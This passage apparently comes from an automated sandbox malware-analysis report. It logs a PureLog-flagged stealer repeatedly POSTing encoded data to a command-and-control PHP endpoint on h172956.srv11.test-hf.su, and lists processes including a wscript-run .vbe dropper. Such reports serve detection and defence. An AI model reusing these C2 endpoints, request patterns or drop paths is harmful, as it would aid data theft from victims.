                                                                    Data Ascii: QZT_[\UQ^WZQW]PXTUT]VZW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D,1-%#=Z'6X,$/]':;68P5/X$7?X18%Z"!Q*9
                                                                    Mar 5, 2024 22:28:50.252248049 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    89192.168.2.54981391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:51.939429998 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:52.146306992 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:52.146541119 CET2596OUTData Raw: 51 5c 54 5c 5b 5b 55 52 5e 57 5a 51 57 51 50 5e 54 56 54 5c 56 54 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\T\[[UR^WZQWQP^TVT\VTWZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!!%#9]$6:8,2';;Z&;!,(!0'1/-,%Z"!Q*
                                                                    Mar 5, 2024 22:28:52.382245064 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    90192.168.2.54981491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:52.718271017 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:52.925309896 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:52.925548077 CET2596OUTData Raw: 54 5a 54 5d 5e 5e 55 51 5e 57 5a 51 57 50 50 5d 54 52 54 53 56 58 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZT]^^UQ^WZQWPP]TRTSVXWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9/!.306$%-,-$801_<6'!<+_'B+_$<1;%Z"!Q*
                                                                    Mar 5, 2024 22:28:53.156841993 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    91192.168.2.54981691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:53.581808090 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:53.788778067 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:53.788966894 CET1920OUTData Raw: 54 5f 51 5c 5b 57 55 52 5e 57 5a 51 57 5e 50 5d 54 5c 54 59 56 5b 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T_Q\[WUR^WZQW^P]T\TYV[WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8'31$&;Y"]3(<2: U",V!,'7+_1/=,9%Z"!Q*
                                                                    Mar 5, 2024 22:28:54.022955894 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    92192.168.2.54981791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:53.705435991 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:53.915766001 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:53.915968895 CET2596OUTData Raw: 54 5a 54 5a 5b 57 55 55 5e 57 5a 51 57 51 50 5d 54 5c 54 5c 56 5b 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TZTZ[WUU^WZQWQP]T\T\V[WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,$#%[35"Y/?>$(/Y& 675?Y0B'2<";%Z"!Q*
                                                                    Mar 5, 2024 22:28:54.153639078 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    93192.168.2.54981891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:54.502968073 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:54.713726997 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:54.713985920 CET2596OUTData Raw: 54 5b 54 5d 5b 59 50 54 5e 57 5a 51 57 5c 50 58 54 5d 54 5c 56 5c 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T[T][YPT^WZQW\PXT]T\V\WUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,W233%:\8?08296/#!/?'7($<"Z,%Z"!Q*=
                                                                    Mar 5, 2024 22:28:54.951894045 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:54 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    94192.168.2.54981991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:55.290255070 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:55.500909090 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:55.501285076 CET2596OUTData Raw: 51 5b 54 5f 5b 56 50 50 5e 57 5a 51 57 50 50 58 54 50 54 5c 56 5e 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q[T_[VPP^WZQWPPXTPT\V^WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8939[0&X/%'319!,4!/7Y$ &1-)%Z"!Q*
                                                                    Mar 5, 2024 22:28:55.739537001 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    95192.168.2.54982091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:56.067059040 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:56.275928020 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:56.276189089 CET2596OUTData Raw: 54 5e 51 5c 5b 5d 50 53 5e 57 5a 51 57 5f 50 53 54 56 54 5a 56 5a 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T^Q\[]PS^WZQW_PSTVTZVZWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,%'3['&],/.^&+3X%9Q6<6(37]&Z!8)%Z"!Q*1
                                                                    Mar 5, 2024 22:28:56.512701988 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    96192.168.2.54982191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:56.849678040 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:57.062222004 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:57.063110113 CET2596OUTData Raw: 51 5e 54 59 5b 58 55 54 5e 57 5a 51 57 5d 50 5f 54 53 54 5f 56 54 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^TY[XUT^WZQW]P_TST_VTWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E82.W$\'6>Y8<"]']190W"<!,_&4%Z2Y;%Z"!Q*9
                                                                    Mar 5, 2024 22:28:57.302175045 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    97192.168.2.54982291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:57.641391993 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:57.854506969 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:57.854836941 CET2596OUTData Raw: 51 5c 54 5a 5b 5a 55 5c 5e 57 5a 51 57 5d 50 59 54 54 54 58 56 5b 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\TZ[ZU\^WZQW]PYTTTXV[WTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/6V'3]36,/*X$8'18!Z(!/X'4;1&Y-)%Z"!Q*9
                                                                    Mar 5, 2024 22:28:58.094347000 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    98192.168.2.54982391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:58.425725937 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:58.637345076 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:58.637620926 CET2596OUTData Raw: 51 59 51 59 5b 5e 55 52 5e 57 5a 51 57 5b 50 5a 54 55 54 58 56 55 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQY[^UR^WZQW[PZTUTXVUWUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9@;!5$U60&\,.X&82,#<8"7'7?_&:/%Z"!Q*!
                                                                    Mar 5, 2024 22:28:58.874694109 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:58 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    99192.168.2.54982591.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:59.241233110 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1920
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:59.451145887 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:59.451585054 CET1920OUTData Raw: 51 5e 54 5e 5b 5c 50 54 5e 57 5a 51 57 5c 50 5d 54 57 54 52 56 59 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^T^[\PT^WZQW\P]TWTRVYW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,!*S$U=^3%/%3;/&9!<#<7Y01?2\,%Z"!Q*=
                                                                    Mar 5, 2024 22:28:59.686433077 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    100192.168.2.54982691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:59.368438005 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:59.581146002 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:29:27.380537987 CET2596OUTData Raw: 54 59 51 59 5b 5b 55 53 5e 57 5a 51 57 50 50 5f 54 5d 54 5c 56 54 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYQY[[US^WZQWPP_T]T\VTWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:/&%3[3&!;*\3;$1;"!(&$+X%/%;%Z"!Q*
                                                                    Mar 5, 2024 22:29:27.763983965 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:29:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:22:26:52
                                                                    Start date:05/03/2024
                                                                    Path:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\hT7clR9Gz2.exe
                                                                    Imagebase:0x7c0000
                                                                    File size:2'733'200 bytes
                                                                    MD5 hash:0CADB063C76CEC669E88F104493A56F1
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2002850710.0000000006AB7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:2
                                                                    Start time:22:26:53
                                                                    Start date:05/03/2024
                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\PortCommon\QBVo6vYwcvtPMCVlfk17MWy9WfGX2h.vbe"
                                                                    Imagebase:0xfc0000
                                                                    File size:147'456 bytes
                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:22:27:19
                                                                    Start date:05/03/2024
